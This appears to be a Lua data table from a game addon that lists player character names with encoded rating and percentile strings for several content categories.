["Yodin"] = "ET:582/77%LB:679/97%LM:962/97%",
["Cokebag"] = "LT:768/97%LB:677/98%LM:849/98%",
["Qianduoduo"] = "ET:673/88%EB:695/89%EM:881/92%",
["Zèd"] = "ET:580/76%EB:672/85%EM:932/94%",
["Tupaclives"] = "RT:539/71%RB:449/61%RM:593/63%",
["Illicitfate"] = "ET:732/94%EB:741/94%EM:884/91%",
["Jezzabelle"] = "ET:339/88%LB:752/95%EM:821/85%",
["Eve"] = "ET:739/94%EB:714/91%EM:750/80%",
["Nottydotty"] = "ET:722/93%LB:644/95%EM:602/88%",
["Boostical"] = "ET:653/86%EB:429/84%EM:478/83%",
["Wizzo"] = "ST:645/99%SB:817/99%LM:941/97%",
["Yfzane"] = "ET:676/89%EB:565/75%EM:873/89%",
["Zumacos"] = "ET:722/93%EB:468/85%EM:738/80%",
["Turbowna"] = "ET:317/87%LB:755/95%LM:809/97%",
["Skineater"] = "ET:739/94%LB:670/97%EM:822/85%",
["Sweetbox"] = "RT:531/71%EB:538/76%EM:688/79%",
["Kimsy"] = "LT:466/96%LB:770/97%EM:931/94%",
["Sleepdog"] = "ET:737/94%LB:760/95%LM:967/97%",
["Creamfilling"] = "LT:779/98%SB:798/99%LM:958/97%",
["Radagast"] = "ET:732/94%LB:774/97%LM:958/97%",
["Stevedode"] = "LT:757/98%SB:791/99%SM:1048/99%",
["Akayra"] = "ET:687/89%LB:727/95%EM:806/86%",
["Lind"] = "ET:307/86%LB:671/98%LM:793/97%",
["Chuckwei"] = "RT:218/72%EB:687/91%EM:710/77%",
["Boom"] = "LT:458/95%EB:658/89%RM:627/69%",
["Coraloca"] = "ET:614/82%EB:741/94%EM:904/93%",
["Berrychan"] = "ET:654/86%EB:732/92%EM:812/86%",
["Along"] = "ET:654/86%EB:547/93%LM:938/98%",
["Kiyomi"] = "ET:655/86%LB:796/98%LM:952/97%",
["Gusherz"] = "LT:750/96%EB:746/93%EM:777/81%",
["Kelthuzadx"] = "ET:643/85%RB:324/72%RM:537/59%",
["Michiku"] = "ET:230/81%EB:615/85%EM:757/85%",
["Thule"] = "ET:678/88%EB:685/88%EM:509/85%",
["Ahkam"] = "ET:562/75%LB:772/97%LM:986/98%",
["Mercyless"] = "ET:734/94%LB:751/95%EM:882/92%",
["Shayn"] = "LT:750/96%LB:775/97%LM:977/98%",
["Yashikawa"] = "ET:561/75%EB:725/94%EM:869/91%",
["Crawlspace"] = "ET:580/77%EB:698/92%LM:927/95%",
["Thugslammer"] = "ET:710/91%LB:793/98%LM:948/96%",
["Ugotmeowed"] = "LT:751/95%EB:736/93%EM:605/88%",
["Riajialt"] = "ET:584/78%EB:717/91%EM:796/85%",
["Mushey"] = "ET:420/94%EB:665/90%EM:675/94%",
["Redøubt"] = "ET:711/91%LB:679/96%EM:749/94%",
["Ddt"] = "ET:582/78%EB:702/90%EM:809/86%",
["Wildtuna"] = "LT:451/95%EB:389/80%LM:695/95%",
["Fidjet"] = "LT:659/95%LB:706/95%EM:557/93%",
["Spells"] = "ET:659/86%LB:750/96%SM:931/99%",
["Magemanguy"] = "RT:417/55%UB:231/31%UM:385/41%",
["Yocha"] = "RT:448/60%EB:558/94%RM:508/60%",
["Westertius"] = "ET:374/92%LB:756/97%LM:805/97%",
["Ferrimrand"] = "ET:347/90%RB:309/71%EM:468/85%",
["Aardnassil"] = "ET:614/82%EB:680/91%EM:754/81%",
["Synergyy"] = "LT:743/95%LB:743/98%LM:931/95%",
["Ericnam"] = "LT:751/95%LB:777/98%LM:944/97%",
["Puz"] = "ET:600/80%EB:660/86%EM:864/90%",
["Alvitrin"] = "ET:576/77%LB:734/98%EM:616/89%",
["Beris"] = "ST:789/99%SB:771/99%SM:918/99%",
["Subcrazi"] = "LT:585/97%EB:734/93%LM:939/96%",
["Justgan"] = "LT:655/98%LB:751/95%EM:740/94%",
["Brikh"] = "RT:509/69%EB:637/82%RM:361/71%",
["Tuu"] = "LT:759/97%LB:777/98%LM:934/97%",
["Demeker"] = "ET:702/91%LB:780/97%EM:882/92%",
["Degs"] = "RT:503/67%RB:552/74%",
["Chestnuts"] = "ET:556/75%EB:601/78%RM:439/50%",
["Drowning"] = "LT:771/98%SB:781/99%LM:939/97%",
["True"] = "LT:757/97%LB:764/97%LM:930/96%",
["Varack"] = "LT:748/95%LB:782/98%LM:947/96%",
["Callofwild"] = "ET:462/88%LB:647/98%EM:860/94%",
["Aykay"] = "ET:695/91%EB:671/86%EM:827/86%",
["Slayzer"] = "LT:757/96%LB:772/97%EM:903/94%",
["Empaler"] = "RT:527/71%LB:760/96%EM:778/81%",
["Fearbot"] = "LT:767/97%LB:780/97%LM:946/96%",
["Wklngg"] = "ET:702/94%LB:721/96%LM:851/96%",
["Keasbey"] = "ET:373/92%LB:779/98%LM:980/98%",
["Scyx"] = "LT:448/95%EB:616/94%LM:802/95%",
["Niko"] = "ET:582/78%LB:798/98%SM:1032/99%",
["Bullvile"] = "RB:537/72%EM:811/84%",
["Stevebud"] = "LB:785/98%EM:922/94%",
["Imnotpoor"] = "UT:73/27%LB:768/97%LM:973/98%",
["Seinjeww"] = "LB:785/98%LM:970/98%",
["Lewi"] = "ET:647/84%EB:673/86%EM:813/85%",
["Burdman"] = "RT:169/59%EB:633/80%EM:873/89%",
["Wicked"] = "ET:508/77%EB:630/86%EM:893/94%",
["Spacemarine"] = "RT:525/73%EB:637/82%EM:754/82%",
["Turbolungz"] = "UT:349/47%LB:767/96%LM:945/96%",
["Lawlsworth"] = "LT:645/98%LB:732/98%EM:644/90%",
["Holytankman"] = "ET:291/86%EB:673/86%EM:612/88%",
["Fashobro"] = "ET:563/76%LB:733/98%RM:355/70%",
["Dezzro"] = "CT:133/17%EB:610/80%UM:83/25%",
["Humanshaman"] = "EB:590/78%EM:663/90%",
["Brinkz"] = "CT:149/24%EB:680/86%EM:781/84%",
["Singlemalt"] = "RB:555/74%EM:825/85%",
["Gotnugz"] = "ET:726/93%LB:788/98%LM:951/97%",
["Crista"] = "RT:482/67%EB:713/93%LM:907/95%",
["Chomskyhonk"] = "LT:749/95%LB:777/97%LM:960/97%",
["Mordekahn"] = "ET:637/88%LB:753/96%EM:706/85%",
["Prato"] = "EB:443/82%RM:331/68%",
["Kimjongbull"] = "RT:162/72%LB:729/95%SM:940/99%",
["Quietslayer"] = "ET:679/88%EB:664/85%RM:438/50%",
["Abracadaddy"] = "RB:535/71%LM:942/95%",
["Slumpgød"] = "ST:665/99%LB:669/96%LM:977/97%",
["Aggrothon"] = "ET:658/86%EB:703/89%EM:404/75%",
["Corpsedaddyb"] = "LT:730/95%LB:593/95%LM:715/97%",
["Gargantua"] = "CT:75/15%EB:673/86%EM:737/86%",
["Baalod"] = "ST:811/99%LB:770/98%SM:993/99%",
["Shavedwigwam"] = "RT:143/50%EB:682/86%EM:607/87%",
["Actusreus"] = "LT:570/97%EB:738/93%LM:936/95%",
["Footsies"] = "ST:720/99%LB:718/98%EM:753/94%",
["Umm"] = "LT:503/96%LB:761/95%EM:907/92%",
["Foli"] = "ST:745/99%LB:726/98%EM:779/94%",
["Jamen"] = "ET:584/76%LB:635/95%LM:852/97%",
["Marywoana"] = "CT:31/11%EB:590/78%RM:654/70%",
["Sonnaeun"] = "UT:126/45%EB:613/80%RM:615/66%",
["Gnawedwick"] = "ET:669/88%LB:779/98%LM:944/96%",
["Yituanrou"] = "RT:228/74%EB:651/84%EM:824/86%",
["Reohh"] = "RT:410/54%EB:668/86%EM:719/77%",
["Erebusson"] = "ET:654/85%EB:741/94%EM:803/85%",
["Tierephenas"] = "EB:654/83%EM:859/88%",
["Wombokombo"] = "LT:777/98%SB:775/99%SM:913/99%",
["Golem"] = "UT:219/29%LB:752/96%EM:914/94%",
["Tacotaco"] = "ET:591/79%EB:729/91%EM:746/79%",
["Pewpewkaboom"] = "LT:536/97%LB:763/96%EM:903/93%",
["Brogabo"] = "ET:734/94%LB:776/97%EM:887/91%",
["Noon"] = "LT:412/95%LB:669/96%EM:815/85%",
["Hjj"] = "LT:786/98%LB:768/96%EM:899/92%",
["Verbinski"] = "EB:734/93%EM:794/82%",
["Sneakyqt"] = "ST:686/99%LB:753/95%LM:833/96%",
["Konobaka"] = "UB:245/31%EM:821/88%",
["Dazgo"] = "ET:479/94%EB:609/85%EM:825/90%",
["Herroprease"] = "EB:604/83%EM:781/84%",
["Bwue"] = "RT:70/54%RB:123/62%RM:197/70%",
["Punkgirl"] = "UB:259/34%CM:52/4%",
["Astyanax"] = "ET:457/93%EB:643/88%EM:832/90%",
["Crazynutz"] = "RB:399/69%EM:570/76%",
["Bass"] = "RB:527/73%EM:797/87%",
["Chickenleg"] = "ET:580/75%EB:475/88%UM:267/30%",
["Luvly"] = "RT:304/68%EB:629/88%EM:770/88%",
["Jaxximus"] = "RB:431/63%RM:603/67%",
["Guoyu"] = "RT:157/55%EB:554/77%EM:807/87%",
["Elementaly"] = "EB:603/82%EM:863/94%",
["Resta"] = "CT:126/13%RB:473/66%RM:720/74%",
["Clarick"] = "CT:14/0%UB:302/40%RM:480/52%",
["Xiba"] = "UT:138/43%EB:417/84%EM:699/77%",
["Hrowsell"] = "CT:28/0%RB:446/61%RM:603/67%",
["Elfadoration"] = "RT:182/60%EB:623/85%EM:720/78%",
["Healsbae"] = "RT:261/74%UB:288/39%RM:505/60%",
["Contrite"] = "CT:144/16%CB:158/18%RM:268/61%",
["Shingetterd"] = "EB:563/78%EM:719/79%",
["Saurman"] = "RB:440/61%EM:718/79%",
["Puksunurriun"] = "RB:328/72%UM:340/36%",
["Whitesquall"] = "ET:482/94%EB:410/83%EM:795/86%",
["Halfheals"] = "UB:360/49%RM:594/66%",
["Dùff"] = "RB:379/53%RM:543/62%",
["Dehunden"] = "ET:744/91%LB:703/95%EM:844/93%",
["Momoguri"] = "RB:500/73%EM:697/86%",
["Rehabz"] = "CT:28/0%RB:259/63%UM:171/47%",
["Spurg"] = "ET:602/77%EB:596/84%RM:645/73%",
["Healeah"] = "RB:239/57%CM:213/20%",
["Cocothunder"] = "RT:154/51%RB:306/67%RM:609/67%",
["Finalspock"] = "RB:266/62%UM:415/45%",
["Kaemoo"] = "ET:657/81%RB:268/64%RM:564/66%",
["Galerage"] = "EB:453/75%EM:830/93%",
["Hakuryu"] = "RT:162/50%EB:519/92%EM:631/91%",
["Criterion"] = "EB:698/93%LM:943/97%",
["Raccoon"] = "UT:140/44%RB:430/59%RM:627/70%",
["Velikiya"] = "RT:154/52%RB:488/70%RM:625/72%",
["Kittysmash"] = "CT:123/16%EB:582/80%EM:786/85%",
["Teddybearz"] = "EB:638/87%EM:891/93%",
["Killcamz"] = "UT:217/26%RB:531/74%EM:643/92%",
["Nualkriofra"] = "UB:119/29%CM:163/18%",
["Yeahno"] = "ET:155/81%EB:539/86%LM:894/96%",
["Shamysham"] = "CT:26/1%RB:232/57%",
["Manïc"] = "CT:111/11%UB:259/33%RM:583/64%",
["Kazusatouma"] = "UB:300/42%RM:505/60%",
["Moowhowho"] = "EB:614/84%EM:868/92%",
["Animatron"] = "CT:34/3%RB:440/64%RM:282/66%",
["Mykhawk"] = "RT:169/67%LB:732/96%LM:879/95%",
["Figueroa"] = "CT:42/3%UB:224/28%",
["Archbishøp"] = "RB:469/67%EM:848/93%",
["Imacasual"] = "EB:467/89%EM:671/83%",
["Freakmeow"] = "ET:776/93%EB:698/94%RM:660/73%",
["Yepp"] = "RT:479/60%EB:571/81%EM:753/85%",
["Ginjjang"] = "CT:148/16%EB:517/75%RM:497/58%",
["Papayaa"] = "RB:348/50%",
["Turnrightup"] = "CT:33/1%RB:331/73%RM:547/60%",
["Negligence"] = "ET:516/84%EB:563/83%EM:749/87%",
["Iyssa"] = "CT:79/24%RB:459/63%RM:568/63%",
["Thattwarlock"] = "LT:776/98%EB:454/88%UM:273/33%",
["Kenitek"] = "ET:741/94%EB:719/91%EM:872/90%",
["Stacked"] = "LT:751/95%EB:718/91%EM:854/88%",
["Norefunds"] = "ET:640/84%EB:653/85%EM:589/91%",
["Amonjin"] = "ET:629/83%EB:572/76%EM:528/89%",
["Inferna"] = "ET:599/80%EB:745/94%EM:890/91%",
["Soulweave"] = "LT:752/96%LB:761/96%LM:974/98%",
["Gunbow"] = "LT:768/97%LB:761/96%EM:895/91%",
["Fatchick"] = "RT:452/59%LB:754/95%EM:817/84%",
["Spedy"] = "LT:779/98%SB:754/99%LM:874/98%",
["Warumar"] = "ET:243/77%EB:558/91%LM:806/96%",
["Iamit"] = "RT:495/67%EB:659/86%RM:628/69%",
["Metrixx"] = "RT:497/66%EB:689/89%EM:826/87%",
["Kynigosa"] = "ST:795/99%SB:752/99%LM:921/95%",
["Uqq"] = "ET:713/92%LB:698/98%EM:826/87%",
["Generica"] = "ET:625/81%EB:692/88%EM:742/79%",
["Nineah"] = "ET:686/89%EB:706/90%LM:926/95%",
["Luude"] = "LT:769/97%SB:775/99%LM:946/97%",
["Wudiguobao"] = "ET:702/91%LB:747/95%EM:735/79%",
["Machala"] = "ET:343/90%EB:741/93%EM:900/92%",
["Xinfoo"] = "ET:673/88%SB:762/99%EM:640/92%",
["Wildwaffle"] = "LT:755/96%EB:723/91%EM:862/90%",
["Mensa"] = "ET:386/93%EB:698/90%EM:848/89%",
["Riotslol"] = "RT:553/74%EB:746/94%EM:934/94%",
["Cosmicgizmo"] = "ET:620/82%EB:690/89%EM:728/79%",
["Typhonus"] = "LT:759/97%SB:773/99%LM:942/98%",
["Helrodrir"] = "LT:499/96%LB:739/95%EM:900/93%",
["Vynlock"] = "LT:753/96%LB:760/95%LM:951/96%",
["Emberend"] = "ST:792/99%SB:806/99%LM:976/98%",
["Wuw"] = "ST:814/99%SB:800/99%LM:980/98%",
["Brokar"] = "ET:732/94%EB:734/93%LM:798/96%",
["Finch"] = "LT:774/97%LB:769/97%LM:946/97%",
["Shintahunter"] = "LT:779/98%EB:730/92%EM:860/90%",
["Tuga"] = "ET:626/83%EB:567/79%EM:474/86%",
["Dreadcølt"] = "LT:755/96%LB:776/97%LM:834/97%",
["Nihau"] = "LT:751/95%LB:772/97%EM:892/91%",
["Zexxar"] = "ET:363/92%LB:695/98%LM:937/95%",
["Timespent"] = "LT:763/96%LB:796/98%EM:893/92%",
["Icemagic"] = "ET:364/91%LB:760/97%LM:938/97%",
["Something"] = "RT:489/65%RB:410/57%RM:614/71%",
["Tingiepola"] = "ET:352/91%RB:520/69%RM:359/73%",
["Savi"] = "ET:648/85%RB:455/66%UM:101/34%",
["Aevice"] = "LT:751/95%EB:723/92%LM:925/95%",
["Liquíd"] = "LT:759/96%LB:773/97%LM:802/96%",
["Dabighomie"] = "ET:297/85%EB:723/92%LM:946/96%",
["Blacksquall"] = "ET:680/89%LB:622/96%LM:721/96%",
["Vinnymac"] = "ET:586/78%EB:601/83%RM:639/74%",
["Stickeybeard"] = "ET:654/86%EB:706/94%EM:834/92%",
["Mugruncher"] = "ET:721/92%LB:752/95%EM:889/92%",
["Trollateder"] = "ET:722/92%LB:719/98%RM:680/74%",
["Moomader"] = "LT:751/95%LB:769/96%LM:969/97%",
["Tmillz"] = "ET:737/94%LB:774/97%LM:955/97%",
["Savagest"] = "LT:759/96%EB:737/93%EM:862/89%",
["Smsmoore"] = "ST:707/99%LB:657/97%EM:877/91%",
["Xiaochouyu"] = "ET:638/84%EB:713/94%EM:782/87%",
["Shadowsfade"] = "ET:721/92%EB:735/92%EM:878/90%",
["Pivinet"] = "ET:628/83%EB:657/89%RM:505/63%",
["Gontier"] = "ET:684/89%EB:571/80%EM:714/81%",
["Spartana"] = "ET:350/90%EB:527/92%LM:718/95%",
["Hanime"] = "LT:726/96%SB:786/99%LM:956/98%",
["Frau"] = "ST:793/99%SB:795/99%LM:920/95%",
["Magiclean"] = "ET:649/85%LB:654/96%EM:702/92%",
["Lapchik"] = "ET:430/79%EB:622/87%EM:718/83%",
["Grízzly"] = "ET:408/86%EB:626/91%",
["Monel"] = "RT:453/62%EB:635/82%EM:435/87%",
["Bonneru"] = "CT:106/13%CB:116/14%UM:364/42%",
["Fleshkin"] = "ET:669/87%EB:684/88%EM:709/76%",
["Solardeath"] = "ET:390/91%LB:761/96%LM:794/96%",
["Xaltana"] = "ET:702/91%EB:725/92%EM:871/90%",
["Kurb"] = "ST:751/99%SB:758/99%SM:958/99%",
["Tashpotatoes"] = "ET:624/87%EB:702/92%EM:751/88%",
["Webay"] = "RT:530/72%EB:501/87%EM:907/93%",
["Leoferic"] = "RT:194/67%RB:561/74%UM:382/44%",
["Meiganqing"] = "ET:251/76%EB:627/82%RM:372/69%",
["Deadwinter"] = "LT:507/96%SB:731/99%SM:908/99%",
["Mindwaste"] = "LT:616/98%EB:743/94%EM:882/91%",
["Saltshaker"] = "EB:738/93%EM:879/90%",
["Cryptstalker"] = "ET:731/93%LB:787/98%EM:931/94%",
["Potfarmer"] = "RT:237/74%EB:614/94%LM:805/95%",
["Vanilaface"] = "LT:487/96%EB:721/91%EM:843/89%",
["Assmodel"] = "LT:782/98%LB:782/98%EM:717/93%",
["Ccoshim"] = "CT:47/5%EB:437/82%EM:756/79%",
["Studer"] = "ET:397/93%LB:737/98%LM:788/95%",
["Siggs"] = "ET:405/93%EB:634/82%EM:890/92%",
["Cashen"] = "RT:185/63%EB:683/86%EM:889/91%",
["Mechafiend"] = "CT:34/8%EB:627/79%EM:823/86%",
["Twosek"] = "RT:417/55%LB:768/97%EM:829/88%",
["Nightblade"] = "LT:749/96%LB:770/97%LM:930/96%",
["Casassinater"] = "LT:500/96%EB:618/94%EM:718/92%",
["Gothicc"] = "ET:724/93%LB:708/97%EM:861/89%",
["Jellyfish"] = "RT:506/69%EB:569/75%RM:261/60%",
["Unusuallybad"] = "RT:539/71%EB:697/89%EM:646/89%",
["Galvarino"] = "RT:464/63%EB:656/84%EM:813/86%",
["Jubeii"] = "RT:508/66%EB:719/91%EM:806/85%",
["Yuela"] = "LT:453/96%EB:653/84%EM:606/88%",
["Hardone"] = "RT:405/56%EB:741/93%EM:779/82%",
["Blast"] = "ET:366/91%LB:768/96%LM:863/98%",
["Zombietank"] = "UT:238/35%EB:650/82%EM:813/85%",
["Dantaye"] = "ET:650/85%EB:702/89%EM:906/93%",
["Yuckee"] = "RT:475/63%EB:678/85%EM:526/82%",
["Sumo"] = "RT:490/65%EB:563/75%RM:491/55%",
["Forollas"] = "UT:107/39%EB:645/82%RM:578/62%",
["Ricknasty"] = "ET:640/84%LB:759/95%EM:863/89%",
["Shifther"] = "ST:848/99%SB:808/99%SM:962/99%",
["Badtzmzo"] = "RT:179/64%EB:633/82%EM:737/78%",
["Pøwerbøøm"] = "EB:646/82%RM:612/65%",
["Damonlock"] = "ET:442/94%LB:767/97%SM:974/99%",
["Marshidec"] = "RT:481/63%EB:467/84%EM:750/79%",
["Kbzafk"] = "RT:554/73%EB:672/86%EM:818/84%",
["Drisco"] = "ET:275/82%EB:616/80%EM:806/84%",
["Aham"] = "RT:466/61%EB:483/86%EM:515/81%",
["Hoots"] = "RT:536/73%EB:535/89%LM:762/95%",
["Jmochi"] = "LB:759/96%LM:944/96%",
["Dawby"] = "ET:337/89%EB:715/90%EM:681/91%",
["Borong"] = "ST:706/99%LB:759/96%EM:907/94%",
["Hoopdedoo"] = "RT:550/72%EB:499/87%EM:489/79%",
["Flexis"] = "ET:599/80%EB:602/93%EM:634/89%",
["Boxman"] = "ET:613/81%EB:668/90%EM:930/94%",
["Yunaito"] = "RT:230/73%EB:561/91%EM:525/82%",
["Erorn"] = "UT:370/48%LB:748/96%LM:961/97%",
["Listenlinda"] = "ET:694/90%EB:673/86%EM:861/91%",
["Houellebecq"] = "RT:418/55%SB:834/99%SM:1018/99%",
["Duckkbeard"] = "RB:541/72%",
["Dotswinning"] = "ET:677/88%LB:781/98%LM:838/97%",
["Minai"] = "ET:311/85%EB:669/84%EM:770/80%",
["Rifk"] = "ET:652/84%LB:644/95%LM:796/95%",
["Hulkhigginz"] = "LT:487/96%EB:543/90%EM:859/90%",
["Volatility"] = "ET:259/79%EB:595/84%EM:777/87%",
["Jibrille"] = "CT:71/23%RB:452/62%RM:567/65%",
["Cutey"] = "RB:471/65%EM:709/78%",
["Teranus"] = "RT:558/71%RB:474/67%RM:553/63%",
["Papanoxx"] = "CB:200/24%CM:134/11%",
["Fugacity"] = "LT:518/96%EB:641/87%EM:885/93%",
["Parayo"] = "CT:68/19%UB:169/41%UM:443/48%",
["Amathor"] = "RB:272/60%UM:279/32%",
["Underlash"] = "RB:421/57%EM:814/88%",
["Gingrhammer"] = "RT:209/65%RB:378/51%RM:575/63%",
["Riggityroll"] = "ET:471/93%EB:377/79%RM:269/62%",
["Stuid"] = "ET:331/84%EB:657/89%EM:852/90%",
["Kiwichoy"] = "ET:446/79%EB:592/85%EM:713/85%",
["Tismo"] = "UB:241/31%UM:106/35%",
["Pushover"] = "CT:27/0%UB:335/47%RM:473/52%",
["Onekrakhana"] = "UB:47/35%",
["Maximo"] = "EB:587/81%EM:789/85%",
["Dystonia"] = "CB:187/22%RM:384/73%",
["Reopro"] = "RB:456/65%RM:532/58%",
["Quitemad"] = "EB:436/85%UM:335/35%",
["Bowu"] = "RB:475/68%UM:136/37%",
["Easonwu"] = "CT:174/20%RB:522/72%EM:758/81%",
["Shamadamadin"] = "RT:162/50%RB:449/64%RM:630/70%",
["Lissabrain"] = "CT:38/7%CB:201/24%EM:451/79%",
["Gzerane"] = "ET:305/81%EB:529/75%CM:48/21%",
["Åces"] = "RT:154/65%EB:358/89%EM:626/92%",
["Ivysaur"] = "ET:440/87%LB:713/96%LM:931/96%",
["Elohi"] = "RB:231/57%RM:646/71%",
["Theò"] = "CT:85/8%UB:213/27%RM:569/66%",
["Justsendit"] = "RT:186/56%EB:596/83%RM:650/74%",
["Anerose"] = "UT:251/29%RB:525/73%EM:800/86%",
["Charlimurphy"] = "CT:31/1%CB:162/18%RM:538/63%",
["Allyari"] = "RB:309/69%UM:228/27%",
["Dirtstache"] = "EB:358/77%CM:55/5%",
["Flandonn"] = "RB:511/73%RM:603/70%",
["Glittergirl"] = "CB:163/18%RM:533/61%",
["Stíllalive"] = "UT:262/31%RB:474/68%RM:391/74%",
["Stemdax"] = "UB:157/38%RM:438/52%",
["Froh"] = "UT:136/45%EB:592/82%RM:557/61%",
["Docducati"] = "EB:470/75%EM:791/90%",
["Girthitude"] = "RB:313/69%CM:142/12%",
["Biteszadusto"] = "CT:173/20%CB:122/12%CM:230/22%",
["Pabloescobar"] = "UT:315/38%RB:521/72%RM:611/67%",
["Sonicboomy"] = "UB:69/47%UM:265/32%",
["Frenk"] = "RB:516/73%EM:757/84%",
["Freezeyuki"] = "UT:216/25%RB:492/70%CM:61/5%",
["Lightnsweet"] = "RB:478/68%EM:467/82%",
["Skeetmeeska"] = "UT:305/37%EB:501/90%EM:828/90%",
["Ffox"] = "RB:439/63%EM:698/80%",
["Campbull"] = "RB:381/54%",
["Ozzgreen"] = "CT:57/14%RB:487/67%EM:858/92%",
["Noeita"] = "EB:541/80%EM:844/92%",
["Murdirheals"] = "UB:249/32%UM:356/42%",
["Fentonmulley"] = "CT:46/3%UB:217/49%CM:206/23%",
["Xiaokemai"] = "ET:321/87%EB:695/89%EM:524/88%",
["Ragemonsters"] = "ST:729/99%LB:678/96%EM:816/85%",
["Amenyxs"] = "RT:551/73%EB:695/89%EM:901/93%",
["Jeht"] = "LT:745/95%EB:710/90%EM:879/90%",
["Flashlag"] = "ET:243/77%EB:515/88%EM:750/79%",
["Radz"] = "RT:553/74%EB:499/90%RM:451/53%",
["Darkmym"] = "LT:455/95%EB:719/94%EM:916/94%",
["Timeripper"] = "ET:727/93%EB:460/87%RM:581/64%",
["Drgooch"] = "ET:703/91%EB:559/79%EM:887/90%",
["Ciya"] = "RT:507/66%UB:351/43%UM:356/37%",
["Devax"] = "LT:753/95%LB:781/98%LM:946/96%",
["Evilhippou"] = "ET:618/82%EB:574/94%",
["Gzarneth"] = "ET:285/83%LB:759/96%LM:972/98%",
["Ixl"] = "ET:656/86%EB:739/94%EM:576/91%",
["Koh"] = "ET:742/94%EB:580/92%EM:903/91%",
["Frozenj"] = "ST:787/99%LB:753/96%EM:824/91%",
["Amnennar"] = "ET:733/94%SB:748/99%EM:482/83%",
["Stupidhunter"] = "LT:790/98%LB:750/95%EM:896/91%",
["Saackz"] = "LT:757/96%SB:760/99%LM:954/97%",
["Sodafountain"] = "UT:118/45%EB:686/88%RM:598/70%",
["Kirinati"] = "ET:710/91%EB:740/94%EM:893/92%",
["Nockson"] = "ST:690/99%SB:812/99%LM:981/98%",
["Littleshark"] = "RT:429/59%RB:285/62%EM:612/88%",
["Chike"] = "LT:781/98%SB:818/99%SM:1000/99%",
["Lildebbie"] = "ET:681/89%LB:770/97%LM:910/96%",
["Ali"] = "RT:201/68%EB:600/79%EM:832/88%",
["Fracksand"] = "LT:675/98%LB:634/97%LM:742/95%",
["Tholk"] = "ET:644/84%RB:359/73%RM:344/69%",
["Pyropathic"] = "LT:665/98%EB:711/94%EM:823/87%",
["Thottbot"] = "ET:676/88%EB:471/88%EM:448/84%",
["Thievul"] = "ET:662/87%EB:615/85%RM:533/66%",
["Facelessvöid"] = "RT:478/63%EB:533/75%EM:742/80%",
["Elundis"] = "ST:775/99%LB:706/98%LM:789/97%",
["Warrsaw"] = "ET:734/94%LB:785/98%EM:930/94%",
["Aalbiss"] = "ET:596/79%EB:671/85%EM:810/84%",
["Choöch"] = "ET:718/92%EB:735/93%EM:911/93%",
["Nightsite"] = "LT:776/97%LB:773/97%LM:936/96%",
["Whitedragoon"] = "ET:604/80%EB:646/83%EM:792/83%",
["Lockmommy"] = "ET:734/94%LB:757/95%LM:935/95%",
["Alyraa"] = "ET:735/94%LB:758/95%LM:938/95%",
["Ocore"] = "ET:576/76%EB:676/85%EM:758/79%",
["Thepredator"] = "LT:784/98%LB:769/97%LM:951/96%",
["Crazypeach"] = "ST:801/99%SB:810/99%LM:962/97%",
["Slowpoke"] = "ET:724/93%LB:773/97%EM:914/93%",
["Hempnight"] = "ET:701/91%LB:783/98%LM:980/98%",
["Alwaysluky"] = "LT:756/96%LB:766/96%EM:876/90%",
["Jyce"] = "LT:524/97%EB:615/85%UM:289/29%",
["Lagforce"] = "ET:495/77%EB:621/87%EM:769/88%",
["Pugg"] = "ST:710/99%LB:718/98%LM:879/97%",
["Dhouwlsc"] = "ST:764/99%LB:706/97%EM:898/92%",
["Faeleth"] = "LT:734/96%LB:724/97%LM:885/97%",
["Xenoblood"] = "LT:762/97%LB:664/98%LM:934/96%",
["Ilovegear"] = "LT:723/95%LB:623/98%LM:890/97%",
["Freezeinory"] = "ET:382/94%LB:770/98%LM:940/98%",
["Offabean"] = "ET:673/91%EB:471/85%EM:680/83%",
["Drossay"] = "LT:713/95%LB:747/97%LM:850/95%",
["Casualwower"] = "ET:241/75%EB:683/87%EM:886/91%",
["Gremmil"] = "LT:612/98%LB:655/96%EM:868/91%",
["Zalkegeroth"] = "LT:708/96%LB:720/98%LM:790/96%",
["Brutalizer"] = "ET:707/93%EB:701/92%EM:767/89%",
["Ashirra"] = "LT:429/95%LB:749/97%LM:784/97%",
["Meranas"] = "ET:361/92%EB:683/91%EM:699/84%",
["Sunderthigh"] = "LT:765/97%LB:777/98%SM:991/99%",
["Nacker"] = "ET:267/80%EB:628/80%EM:757/79%",
["Intense"] = "LT:736/95%LB:683/98%LM:738/97%",
["Szod"] = "LT:776/98%LB:775/98%LM:952/97%",
["Glopp"] = "ET:715/92%LB:763/96%LM:935/95%",
["Weffyy"] = "ET:304/86%EB:480/85%EM:591/87%",
["Lagunas"] = "CT:51/18%SB:841/99%SM:1008/99%",
["Gimmethatnc"] = "LT:440/95%EB:689/88%EM:896/92%",
["Dyspnea"] = "RT:439/58%EB:608/94%EM:745/93%",
["Endokin"] = "LT:553/97%LB:765/96%EM:909/93%",
["Dojacats"] = "ET:680/88%EB:585/77%RM:628/67%",
["Funnymudpee"] = "LT:744/95%LB:764/96%EM:534/85%",
["Crenix"] = "EB:545/90%LM:951/95%",
["Docowsgew"] = "LT:614/98%SB:783/99%SM:980/99%",
["Chopperbob"] = "LT:464/96%EB:692/88%LM:779/95%",
["Spectèr"] = "UT:240/31%RB:532/71%RM:318/64%",
["Wrecklin"] = "ET:550/75%LB:663/96%LM:940/96%",
["Ryllian"] = "UT:248/36%EB:725/92%EM:795/85%",
["Crazymilk"] = "ET:437/93%LB:657/96%EM:890/91%",
["Demiwarrior"] = "LT:440/95%EB:729/92%EM:745/94%",
["Thiman"] = "LT:528/97%EB:684/87%EM:829/88%",
["Pikahtank"] = "ET:705/91%LB:751/95%LM:908/96%",
["Virtutis"] = "ET:342/90%EB:614/94%EM:861/89%",
["Starbust"] = "ET:618/82%EB:741/93%EM:829/88%",
["Rte"] = "EB:631/80%EM:866/89%",
["Annihilatism"] = "ET:715/92%LB:757/95%EM:830/88%",
["Lemonice"] = "LT:442/95%EB:710/89%EM:896/92%",
["Productive"] = "LT:527/96%EB:590/93%EM:800/84%",
["Cintryne"] = "RT:387/54%RB:563/74%EM:757/82%",
["Brieasy"] = "RT:225/74%LB:791/98%SM:1004/99%",
["Dezohan"] = "ET:292/83%EB:620/81%EM:841/86%",
["Blond"] = "LT:548/97%EB:714/90%EM:806/86%",
["Ralphsalo"] = "LT:762/96%LB:761/96%LM:956/97%",
["Zerglings"] = "ET:578/77%EB:739/93%EM:877/90%",
["Warlockvite"] = "ET:676/88%LB:779/98%LM:984/98%",
["Azuru"] = "RB:538/72%EM:909/92%",
["Gwokgwok"] = "LT:747/96%LB:763/97%LM:901/96%",
["Saucexxy"] = "RT:224/71%EB:590/93%EM:672/90%",
["Hotslice"] = "SB:854/99%SM:1059/99%",
